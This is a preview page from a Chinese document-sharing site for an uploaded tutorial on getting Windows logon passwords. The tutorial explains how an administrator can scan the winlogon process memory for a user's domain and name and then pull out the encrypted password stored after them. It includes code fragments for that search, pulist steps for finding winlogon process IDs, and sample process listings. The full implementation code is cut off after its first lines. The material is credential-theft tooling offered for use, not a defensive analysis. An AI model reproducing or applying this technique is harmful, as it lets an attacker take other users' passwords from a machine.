欢迎来到天天文库
浏览记录
ID:42670028
大小:23.88 KB
页数:19页
时间:2019-09-19
《获取windows登陆账户密码》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、WindowsLogonProcess,WindowsNT用户登陆程序,管理用户登录和退出。因为登陆的域名和用户名是明文存储在winlogon进程里的,而Password是限定了查找本进程用户的密码<167-174: GetEnvironmentVariableW(L"USERNAME",UserName,0x400); GetEnvironmentVariableW(L"USERDOMAIN",UserDomain,0x400);>,然后到winlogon进程的空间中查找UserDomain和UserName<590://在WinLogon的内存空间中寻找UserName和Dom
2、ainName的字符串if((wcscmp((wchar_t*)RealStartingAddressP,UserName)==0)&&(wcscmp((wchar_t*)((DWORD)RealStartingAddressP+USER_DOMAIN_OFFSET_WIN2K),UserDomain)==0))>,找到后就查后边的加密口令。其实只要你自己指定用户名和winlogon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。1.pulist,找到系统里登陆的域名和用户名,及winlogon进程id2.然后给每个winlogon进程id
3、查找指定的用户就行了。example:C:DocumentsandSettingsbingle>pulistProcess PID UserIdle 0System 8smss.exe 164 NTAUTHORITYSYSTEMcsrss.exe 192 NTAUTHORITYSYSTEMwinlogon.exe 188 NTAUTHORITYSYSTEMwins.exe 1212NTAUTHORITYSYSTEMExplorer.exe 388 TEST-2KSERVERAdministratorinternat.exe
4、 1828TEST-2KSERVERAdministratorconime.exe 1868TEST-2KSERVERAdministratormsiexec.exe 1904NTAUTHORITYSYSTEMtlntsvr.exe 1048NTAUTHORITYSYSTEMtaskmgr.exe 1752TEST-2KSERVERAdministratorcsrss.exe 2056NTAUTHORITYSYSTEMwinlogon.exe 2416NTAUTHORITYSYSTEMrdpclip.exe 2448TEST-2KSERVERclovea
5、Explorer.exe 2408TEST-2KSERVERcloveainternat.exe 1480TEST-2KSERVERcloveacmd.exe 2508TEST-2KSERVERAdministratorntshell.exe 368 TEST-2KSERVERAdministratorntshell.exe 1548TEST-2KSERVERAdministratorntshell.exe 1504TEST-2KSERVERAdministratorcsrss.exe 1088NTAUTHORITYSYSTEMwinlogon.exe
6、 1876NTAUTHORITYSYSTEMrdpclip.exe 1680TEST-2KSERVERbingleExplorer.exe 2244TEST-2KSERVERbingleconime.exe 2288TEST-2KSERVERbingleinternat.exe 1592TEST-2KSERVERbinglecmd.exe 1692TEST-2KSERVERbinglemdm.exe 2476TEST-2KSERVERbingletaskmgr.exe 752 TEST-2KSERVERbinglepulist.exe 2
7、532TEST-2KSERVERbingle具体实现代码如下双击代码全选#include #include #include #include typedefstruct_UNICODE_STRING { USHORTLength; USHORTMaximumLength;
此文档下载收益归作者所有